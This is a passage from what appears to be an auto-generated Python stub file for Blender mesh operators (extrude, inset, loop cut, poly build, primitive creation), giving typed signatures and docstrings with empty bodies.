selected edges \n\n '''\n\n pass\n\n\ndef edge_face_add():\n '''Add an edge or face to selected \n\n '''\n\n pass\n\n\ndef edge_rotate(use_ccw: bool = False):\n '''Rotate selected edge or adjoining faces \n\n :param use_ccw: Counter Clockwise \n :type use_ccw: bool\n '''\n\n pass\n\n\ndef edge_split():\n '''Split selected edges so that each neighbor face gets its own copy \n\n '''\n\n pass\n\n\ndef edgering_select(extend: bool = False,\n deselect: bool = False,\n toggle: bool = False,\n ring: bool = True):\n '''Select an edge ring \n\n :param extend: Extend, Extend the selection \n :type extend: bool\n :param deselect: Deselect, Remove from the selection \n :type deselect: bool\n :param toggle: Toggle Select, Toggle the selection \n :type toggle: bool\n :param ring: Select Ring, Select ring \n :type ring: bool\n '''\n\n pass\n\n\ndef edges_select_sharp(sharpness: float = 0.523599):\n '''Select all sharp-enough edges \n\n :param sharpness: Sharpness \n :type sharpness: float\n '''\n\n pass\n\n\ndef extrude_context(use_normal_flip: bool = False, mirror: bool = False):\n '''Extrude selection \n\n :param use_normal_flip: Flip Normals \n :type use_normal_flip: bool\n :param mirror: Mirror Editing \n :type mirror: bool\n '''\n\n pass\n\n\ndef extrude_context_move(MESH_OT_extrude_context=None,\n TRANSFORM_OT_translate=None):\n '''Extrude region together along the average normal \n\n :param MESH_OT_extrude_context: Extrude Context, Extrude selection \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef extrude_edges_indiv(use_normal_flip: bool = False, mirror: bool = False):\n '''Extrude individual edges only \n\n :param use_normal_flip: Flip Normals \n :type use_normal_flip: bool\n :param mirror: Mirror Editing \n :type mirror: bool\n '''\n\n pass\n\n\ndef extrude_edges_move(MESH_OT_extrude_edges_indiv=None,\n TRANSFORM_OT_translate=None):\n '''Extrude edges and move result \n\n :param MESH_OT_extrude_edges_indiv: Extrude Only Edges, Extrude individual edges only \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef extrude_faces_indiv(mirror: bool = False):\n '''Extrude individual faces only \n\n :param mirror: Mirror Editing \n :type mirror: bool\n '''\n\n pass\n\n\ndef extrude_faces_move(MESH_OT_extrude_faces_indiv=None,\n TRANSFORM_OT_shrink_fatten=None):\n '''Extrude each individual face separately along local normals \n\n :param MESH_OT_extrude_faces_indiv: Extrude Individual Faces, Extrude individual faces only \n :param TRANSFORM_OT_shrink_fatten: Shrink/Fatten, Shrink/fatten selected vertices along normals \n '''\n\n pass\n\n\ndef extrude_region(use_normal_flip: bool = False, mirror: bool = False):\n '''Extrude region of faces \n\n :param use_normal_flip: Flip Normals \n :type use_normal_flip: bool\n :param mirror: Mirror Editing \n :type mirror: bool\n '''\n\n pass\n\n\ndef extrude_region_move(MESH_OT_extrude_region=None,\n TRANSFORM_OT_translate=None):\n '''Extrude region and move result \n\n :param MESH_OT_extrude_region: Extrude Region, Extrude region of faces \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef extrude_region_shrink_fatten(MESH_OT_extrude_region=None,\n TRANSFORM_OT_shrink_fatten=None):\n '''Extrude region together along local normals \n\n :param MESH_OT_extrude_region: Extrude Region, Extrude region of faces \n :param TRANSFORM_OT_shrink_fatten: Shrink/Fatten, Shrink/fatten selected vertices along normals \n '''\n\n pass\n\n\ndef extrude_repeat(offset: float = 2.0, steps: int = 10):\n '''Extrude selected vertices, edges or faces repeatedly \n\n :param offset: Offset \n :type offset: float\n :param steps: Steps \n :type steps: int\n '''\n\n pass\n\n\ndef extrude_vertices_move(MESH_OT_extrude_verts_indiv=None,\n TRANSFORM_OT_translate=None):\n '''Extrude vertices and move result \n\n :param MESH_OT_extrude_verts_indiv: Extrude Only Vertices, Extrude individual vertices only \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef extrude_verts_indiv(mirror: bool = False):\n '''Extrude individual vertices only \n\n :param mirror: Mirror Editing \n :type mirror: bool\n '''\n\n pass\n\n\ndef face_make_planar(factor: float = 1.0, repeat: int = 1):\n '''Flatten selected faces \n\n :param factor: Factor \n :type factor: float\n :param repeat: Iterations \n :type repeat: int\n '''\n\n pass\n\n\ndef face_split_by_edges():\n '''Weld loose edges into faces (splitting them into new faces) \n\n '''\n\n pass\n\n\ndef faces_mirror_uv(direction: typing.Union[int, str] = 'POSITIVE',\n precision: int = 3):\n '''Copy mirror UV coordinates on the X axis based on a mirrored mesh \n\n :param direction: Axis Direction \n :type direction: typing.Union[int, str]\n :param precision: Precision, Tolerance for finding vertex duplicates \n :type precision: int\n '''\n\n pass\n\n\ndef faces_select_linked_flat(sharpness: float = 0.0174533):\n '''Select linked faces by angle \n\n :param sharpness: Sharpness \n :type sharpness: float\n '''\n\n pass\n\n\ndef faces_shade_flat():\n '''Display faces flat \n\n '''\n\n pass\n\n\ndef faces_shade_smooth():\n '''Display faces smooth (using vertex normals) \n\n '''\n\n pass\n\n\ndef fill(use_beauty: bool = True):\n '''Fill a selected edge loop with faces \n\n :param use_beauty: Beauty, Use best triangulation division \n :type use_beauty: bool\n '''\n\n pass\n\n\ndef fill_grid(span: int = 1, offset: int = 0, use_interp_simple: bool = False):\n '''Fill grid from two loops \n\n :param span: Span, Number of grid columns \n :type span: int\n :param offset: Offset, Vertex that is the corner of the grid \n :type offset: int\n :param use_interp_simple: Simple Blending, Use simple interpolation of grid vertices \n :type use_interp_simple: bool\n '''\n\n pass\n\n\ndef fill_holes(sides: int = 4):\n '''Fill in holes (boundary edge loops) \n\n :param sides: Sides, Number of sides in hole required to fill (zero fills all holes) \n :type sides: int\n '''\n\n pass\n\n\ndef flip_normals():\n '''Flip the direction of selected faces’ normals (and of their vertices) \n\n '''\n\n pass\n\n\ndef hide(unselected: bool = False):\n '''Hide (un)selected vertices, edges or faces \n\n :param unselected: Unselected, Hide unselected rather than selected \n :type unselected: bool\n '''\n\n pass\n\n\ndef inset(use_boundary: bool = True,\n use_even_offset: bool = True,\n use_relative_offset: bool = False,\n use_edge_rail: bool = False,\n thickness: float = 0.0,\n depth: float = 0.0,\n use_outset: bool = False,\n use_select_inset: bool = False,\n use_individual: bool = False,\n use_interpolate: bool = True,\n release_confirm: bool = False):\n '''Inset new faces into selected faces \n\n :param use_boundary: Boundary, Inset face boundaries \n :type use_boundary: bool\n :param use_even_offset: Offset Even, Scale the offset to give more even thickness \n :type use_even_offset: bool\n :param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry \n :type use_relative_offset: bool\n :param use_edge_rail: Edge Rail, Inset the region along existing edges \n :type use_edge_rail: bool\n :param thickness: Thickness \n :type thickness: float\n :param depth: Depth \n :type depth: float\n :param use_outset: Outset, Outset rather than inset \n :type use_outset: bool\n :param use_select_inset: Select Outer, Select the new inset faces \n :type use_select_inset: bool\n :param use_individual: Individual, Individual Face Inset \n :type use_individual: bool\n :param use_interpolate: Interpolate, Blend face data across the inset \n :type use_interpolate: bool\n :param release_confirm: Confirm on Release \n :type release_confirm: bool\n '''\n\n pass\n\n\ndef intersect(mode: typing.Union[int, str] = 'SELECT_UNSELECT',\n separate_mode: typing.Union[int, str] = 'CUT',\n threshold: float = 1e-06):\n '''Cut an intersection into faces \n\n :param mode: SourceSELECT Self Intersect, Self intersect selected faces.SELECT_UNSELECT Selected/Unselected, Intersect selected with unselected faces. \n :type mode: typing.Union[int, str]\n :param separate_mode: Separate ModeALL All, Separate all geometry from intersections.CUT Cut, Cut into geometry keeping each side separate (Selected/Unselected only).NONE Merge, Merge all geometry from the intersection. \n :type separate_mode: typing.Union[int, str]\n :param threshold: Merge threshold \n :type threshold: float\n '''\n\n pass\n\n\ndef intersect_boolean(operation: typing.Union[int, str] = 'DIFFERENCE',\n use_swap: bool = False,\n threshold: float = 1e-06):\n '''Cut solid geometry from selected to unselected \n\n :param operation: Boolean \n :type operation: typing.Union[int, str]\n :param use_swap: Swap, Use with difference intersection to swap which side is kept \n :type use_swap: bool\n :param threshold: Merge threshold \n :type threshold: float\n '''\n\n pass\n\n\ndef knife_project(cut_through: bool = False):\n '''Use other objects outlines & boundaries to project knife cuts \n\n :param cut_through: Cut through, Cut through all faces, not just visible ones \n :type cut_through: bool\n '''\n\n pass\n\n\ndef knife_tool(use_occlude_geometry: bool = True,\n only_selected: bool = False,\n wait_for_input: bool = True):\n '''Cut new topology \n\n :param use_occlude_geometry: Occlude Geometry, Only cut the front most geometry \n :type use_occlude_geometry: bool\n :param only_selected: Only Selected, Only cut selected geometry \n :type only_selected: bool\n :param wait_for_input: Wait for Input \n :type wait_for_input: bool\n '''\n\n pass\n\n\ndef loop_multi_select(ring: bool = False):\n '''Select a loop of connected edges by connection type \n\n :param ring: Ring \n :type ring: bool\n '''\n\n pass\n\n\ndef loop_select(extend: bool = False,\n deselect: bool = False,\n toggle: bool = False,\n ring: bool = False):\n '''Select a loop of connected edges \n\n :param extend: Extend Select, Extend the selection \n :type extend: bool\n :param deselect: Deselect, Remove from the selection \n :type deselect: bool\n :param toggle: Toggle Select, Toggle the selection \n :type toggle: bool\n :param ring: Select Ring, Select ring \n :type ring: bool\n '''\n\n pass\n\n\ndef loop_to_region(select_bigger: bool = False):\n '''Select region of faces inside of a selected loop of edges \n\n :param select_bigger: Select Bigger, Select bigger regions instead of smaller ones \n :type select_bigger: bool\n '''\n\n pass\n\n\ndef loopcut(number_cuts: int = 1,\n smoothness: float = 0.0,\n falloff: typing.Union[int, str] = 'INVERSE_SQUARE',\n object_index: int = -1,\n edge_index: int = -1,\n mesh_select_mode_init=(False, False, False)):\n '''Add a new loop between existing loops \n\n :param number_cuts: Number of Cuts \n :type number_cuts: int\n :param smoothness: Smoothness, Smoothness factor \n :type smoothness: float\n :param falloff: Falloff, Falloff type the featherSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff. \n :type falloff: typing.Union[int, str]\n :param object_index: Object Index \n :type object_index: int\n :param edge_index: Edge Index \n :type edge_index: int\n '''\n\n pass\n\n\ndef loopcut_slide(MESH_OT_loopcut=None, TRANSFORM_OT_edge_slide=None):\n '''Cut mesh loop and slide it \n\n :param MESH_OT_loopcut: Loop Cut, Add a new loop between existing loops \n :param TRANSFORM_OT_edge_slide: Edge Slide, Slide an edge loop along a mesh \n '''\n\n pass\n\n\ndef mark_freestyle_edge(clear: bool = False):\n '''(Un)mark selected edges as Freestyle feature edges \n\n :param clear: Clear \n :type clear: bool\n '''\n\n pass\n\n\ndef mark_freestyle_face(clear: bool = False):\n '''(Un)mark selected faces for exclusion from Freestyle feature edge detection \n\n :param clear: Clear \n :type clear: bool\n '''\n\n pass\n\n\ndef mark_seam(clear: bool = False):\n '''(Un)mark selected edges as a seam \n\n :param clear: Clear \n :type clear: bool\n '''\n\n pass\n\n\ndef mark_sharp(clear: bool = False, use_verts: bool = False):\n '''(Un)mark selected edges as sharp \n\n :param clear: Clear \n :type clear: bool\n :param use_verts: Vertices, Consider vertices instead of edges to select which edges to (un)tag as sharp \n :type use_verts: bool\n '''\n\n pass\n\n\ndef merge(type: typing.Union[int, str] = 'CENTER', uvs: bool = False):\n '''Merge selected vertices \n\n :param type: Type, Merge method to use \n :type type: typing.Union[int, str]\n :param uvs: UVs, Move UVs according to merge \n :type uvs: bool\n '''\n\n pass\n\n\ndef merge_normals():\n '''Merge custom normals of selected vertices \n\n '''\n\n pass\n\n\ndef mod_weighted_strength(set: bool = False,\n face_strength: typing.Union[int, str] = 'MEDIUM'):\n '''Set/Get strength of face (used in Weighted Normal modifier) \n\n :param set: Set value, Set Value of faces \n :type set: bool\n :param face_strength: Face Strength, Strength to use for assigning or selecting face influence for weighted normal modifier \n :type face_strength: typing.Union[int, str]\n '''\n\n pass\n\n\ndef normals_make_consistent(inside: bool = False):\n '''Make face and vertex normals point either outside or inside the mesh \n\n :param inside: Inside \n :type inside: bool\n '''\n\n pass\n\n\ndef normals_tools(mode: typing.Union[int, str] = 'COPY',\n absolute: bool = False):\n '''Custom normals tools using Normal Vector of UI \n\n :param mode: Mode, Mode of tools taking input from InterfaceCOPY Copy Normal, Copy normal to buffer.PASTE Paste Normal, Paste normal from buffer.ADD Add Normal, Add normal vector with selection.MULTIPLY Multiply Normal, Multiply normal vector with selection.RESET Reset Normal, Reset buffer and/or normal of selected element. \n :type mode: typing.Union[int, str]\n :param absolute: Absolute Coordinates, Copy Absolute coordinates or Normal vector \n :type absolute: bool\n '''\n\n pass\n\n\ndef offset_edge_loops(use_cap_endpoint: bool = False):\n '''Create offset edge loop from the current selection \n\n :param use_cap_endpoint: Cap Endpoint, Extend loop around end-points \n :type use_cap_endpoint: bool\n '''\n\n pass\n\n\ndef offset_edge_loops_slide(MESH_OT_offset_edge_loops=None,\n TRANSFORM_OT_edge_slide=None):\n '''Offset edge loop slide \n\n :param MESH_OT_offset_edge_loops: Offset Edge Loop, Create offset edge loop from the current selection \n :param TRANSFORM_OT_edge_slide: Edge Slide, Slide an edge loop along a mesh \n '''\n\n pass\n\n\ndef paint_mask_extract(mask_threshold: float = 0.5,\n add_boundary_loop: bool = True,\n smooth_iterations: int = 4,\n apply_shrinkwrap: bool = True,\n add_solidify: bool = True):\n '''Create a new mesh object from the current paint mask \n\n :param mask_threshold: Threshold, Minimum mask value to consider the vertex valid to extract a face from the original mesh \n :type mask_threshold: float\n :param add_boundary_loop: Add Boundary Loop, Add an extra edge loop to better preserve the shape when applying a subdivision surface modifier \n :type add_boundary_loop: bool\n :param smooth_iterations: Smooth Iterations, Smooth iterations applied to the extracted mesh \n :type smooth_iterations: int\n :param apply_shrinkwrap: Project to Sculpt, Project the extracted mesh into the original sculpt \n :type apply_shrinkwrap: bool\n :param add_solidify: Extract as Solid, Extract the mask as a solid object with a solidify modifier \n :type add_solidify: bool\n '''\n\n pass\n\n\ndef point_normals(mode: typing.Union[int, str] = 'COORDINATES',\n invert: bool = False,\n align: bool = False,\n target_location: float = (0.0, 0.0, 0.0),\n spherize: bool = False,\n spherize_strength: float = 0.1):\n '''Point selected custom normals to specified Target \n\n :param mode: Mode, How to define coordinates to point custom normals toCOORDINATES Coordinates, Use static coordinates (defined by various means).MOUSE Mouse, Follow mouse cursor. \n :type mode: typing.Union[int, str]\n :param invert: Invert, Invert affected normals \n :type invert: bool\n :param align: Align, Make all affected normals parallel \n :type align: bool\n :param target_location: Target, Target location to which normals will point \n :type target_location: float\n :param spherize: Spherize, Interpolate between original and new normals \n :type spherize: bool\n :param spherize_strength: Spherize Strength, Ratio of spherized normal to original normal \n :type spherize_strength: float\n '''\n\n pass\n\n\ndef poke(offset: float = 0.0,\n use_relative_offset: bool = False,\n center_mode: typing.Union[int, str] = 'MEDIAN_WEIGHTED'):\n '''Split a face into a fan \n\n :param offset: Poke Offset, Poke Offset \n :type offset: float\n :param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry \n :type use_relative_offset: bool\n :param center_mode: Poke Center, Poke Face Center CalculationMEDIAN_WEIGHTED Weighted Median, Weighted median face center.MEDIAN Median, Median face center.BOUNDS Bounds, Face bounds center. \n :type center_mode: typing.Union[int, str]\n '''\n\n pass\n\n\ndef polybuild_delete_at_cursor(\n mirror: bool = False,\n use_proportional_edit: bool = False,\n proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',\n proportional_size: float = 1.0,\n use_proportional_connected: bool = False,\n use_proportional_projected: bool = False,\n release_confirm: bool = False,\n use_accurate: bool = False):\n '''Undocumented contribute \n\n :param mirror: Mirror Editing \n :type mirror: bool\n :param use_proportional_edit: Proportional Editing \n :type use_proportional_edit: bool\n :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. \n :type proportional_edit_falloff: typing.Union[int, str]\n :param proportional_size: Proportional Size \n :type proportional_size: float\n :param use_proportional_connected: Connected \n :type use_proportional_connected: bool\n :param use_proportional_projected: Projected (2D) \n :type use_proportional_projected: bool\n :param release_confirm: Confirm on Release, Always confirm operation when releasing button \n :type release_confirm: bool\n :param use_accurate: Accurate, Use accurate transformation \n :type use_accurate: bool\n '''\n\n pass\n\n\ndef polybuild_dissolve_at_cursor():\n '''Undocumented contribute \n\n '''\n\n pass\n\n\ndef polybuild_extrude_at_cursor_move(\n MESH_OT_polybuild_transform_at_cursor=None,\n MESH_OT_extrude_edges_indiv=None,\n TRANSFORM_OT_translate=None):\n '''Undocumented contribute \n\n :param MESH_OT_polybuild_transform_at_cursor: Poly Build Transform at Cursor \n :param MESH_OT_extrude_edges_indiv: Extrude Only Edges, Extrude individual edges only \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef polybuild_face_at_cursor(\n create_quads: bool = True,\n mirror: bool = False,\n use_proportional_edit: bool = False,\n proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',\n proportional_size: float = 1.0,\n use_proportional_connected: bool = False,\n use_proportional_projected: bool = False,\n release_confirm: bool = False,\n use_accurate: bool = False):\n '''Undocumented contribute \n\n :param create_quads: Create quads, Automatically split edges in triangles to maintain quad topology \n :type create_quads: bool\n :param mirror: Mirror Editing \n :type mirror: bool\n :param use_proportional_edit: Proportional Editing \n :type use_proportional_edit: bool\n :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. \n :type proportional_edit_falloff: typing.Union[int, str]\n :param proportional_size: Proportional Size \n :type proportional_size: float\n :param use_proportional_connected: Connected \n :type use_proportional_connected: bool\n :param use_proportional_projected: Projected (2D) \n :type use_proportional_projected: bool\n :param release_confirm: Confirm on Release, Always confirm operation when releasing button \n :type release_confirm: bool\n :param use_accurate: Accurate, Use accurate transformation \n :type use_accurate: bool\n '''\n\n pass\n\n\ndef polybuild_face_at_cursor_move(MESH_OT_polybuild_face_at_cursor=None,\n TRANSFORM_OT_translate=None):\n '''Undocumented contribute \n\n :param MESH_OT_polybuild_face_at_cursor: Poly Build Face at Cursor \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef polybuild_split_at_cursor(\n mirror: bool = False,\n use_proportional_edit: bool = False,\n proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',\n proportional_size: float = 1.0,\n use_proportional_connected: bool = False,\n use_proportional_projected: bool = False,\n release_confirm: bool = False,\n use_accurate: bool = False):\n '''Undocumented contribute \n\n :param mirror: Mirror Editing \n :type mirror: bool\n :param use_proportional_edit: Proportional Editing \n :type use_proportional_edit: bool\n :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. \n :type proportional_edit_falloff: typing.Union[int, str]\n :param proportional_size: Proportional Size \n :type proportional_size: float\n :param use_proportional_connected: Connected \n :type use_proportional_connected: bool\n :param use_proportional_projected: Projected (2D) \n :type use_proportional_projected: bool\n :param release_confirm: Confirm on Release, Always confirm operation when releasing button \n :type release_confirm: bool\n :param use_accurate: Accurate, Use accurate transformation \n :type use_accurate: bool\n '''\n\n pass\n\n\ndef polybuild_split_at_cursor_move(MESH_OT_polybuild_split_at_cursor=None,\n TRANSFORM_OT_translate=None):\n '''Undocumented contribute \n\n :param MESH_OT_polybuild_split_at_cursor: Poly Build Split at Cursor \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef polybuild_transform_at_cursor(\n mirror: bool = False,\n use_proportional_edit: bool = False,\n proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',\n proportional_size: float = 1.0,\n use_proportional_connected: bool = False,\n use_proportional_projected: bool = False,\n release_confirm: bool = False,\n use_accurate: bool = False):\n '''Undocumented contribute \n\n :param mirror: Mirror Editing \n :type mirror: bool\n :param use_proportional_edit: Proportional Editing \n :type use_proportional_edit: bool\n :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. \n :type proportional_edit_falloff: typing.Union[int, str]\n :param proportional_size: Proportional Size \n :type proportional_size: float\n :param use_proportional_connected: Connected \n :type use_proportional_connected: bool\n :param use_proportional_projected: Projected (2D) \n :type use_proportional_projected: bool\n :param release_confirm: Confirm on Release, Always confirm operation when releasing button \n :type release_confirm: bool\n :param use_accurate: Accurate, Use accurate transformation \n :type use_accurate: bool\n '''\n\n pass\n\n\ndef polybuild_transform_at_cursor_move(\n MESH_OT_polybuild_transform_at_cursor=None,\n TRANSFORM_OT_translate=None):\n '''Undocumented contribute \n\n :param MESH_OT_polybuild_transform_at_cursor: Poly Build Transform at Cursor \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef primitive_circle_add(vertices: int = 32,\n radius: float = 1.0,\n fill_type: typing.Union[int, str] = 'NOTHING',\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a circle mesh \n\n :param vertices: Vertices \n :type vertices: int\n :param radius: Radius \n :type radius: float\n :param fill_type: Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans. \n :type fill_type: typing.Union[int, str]\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_cone_add(vertices: int = 32,\n radius1: float = 1.0,\n radius2: float = 0.0,\n depth: float = 2.0,\n end_fill_type: typing.Union[int, str] = 'NGON',\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a conic mesh \n\n :param vertices: Vertices \n :type vertices: int\n :param radius1: Radius 1 \n :type radius1: float\n :param radius2: Radius 2 \n :type radius2: float\n :param depth: Depth \n :type depth: float\n :param end_fill_type: Base Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans. \n :type end_fill_type: typing.Union[int, str]\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_cube_add(size: float = 2.0,\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a cube mesh \n\n :param size: Size \n :type size: float\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_cube_add_gizmo(\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0),\n matrix: float = ((0.0, 0.0, 0.0, 0.0), (0.0, 0.0, 0.0, 0.0),\n (0.0, 0.0, 0.0, 0.0), (0.0, 0.0, 0.0, 0.0))):\n '''Construct a cube mesh \n\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n :param matrix: Matrix \n :type matrix: float\n '''\n\n pass\n\n\ndef primitive_cylinder_add(vertices: int = 32,\n radius: float = 1.0,\n depth: float = 2.0,\n end_fill_type: typing.Union[int, str] = 'NGON',\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a cylinder mesh \n\n :param vertices: Vertices \n :type vertices: int\n :param radius: Radius \n :type radius: float\n :param depth: Depth \n :type depth: float\n :param end_fill_type: Cap Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans. \n :type end_fill_type: typing.Union[int, str]\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_grid_add(x_subdivisions: int = 10,\n y_subdivisions: int = 10,\n size: float = 2.0,\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a grid mesh \n\n :param x_subdivisions: X Subdivisions \n :type x_subdivisions: int\n :param y_subdivisions: Y Subdivisions \n :type y_subdivisions: int\n :param size: Size \n :type size: float\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_ico_sphere_add(subdivisions: int = 2,\n radius: float = 1.0,\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct an Icosphere mesh \n\n :param subdivisions: Subdivisions \n :type subdivisions: int\n :param radius: Radius \n :type radius: float\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_monkey_add(size: float = 2.0,\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a Suzanne mesh \n\n :param size: Size \n :type size: float\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_plane_add(size: float = 2.0,\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a filled planar mesh with 4 vertices \n\n :param size: Size \n :type size: float\n :param 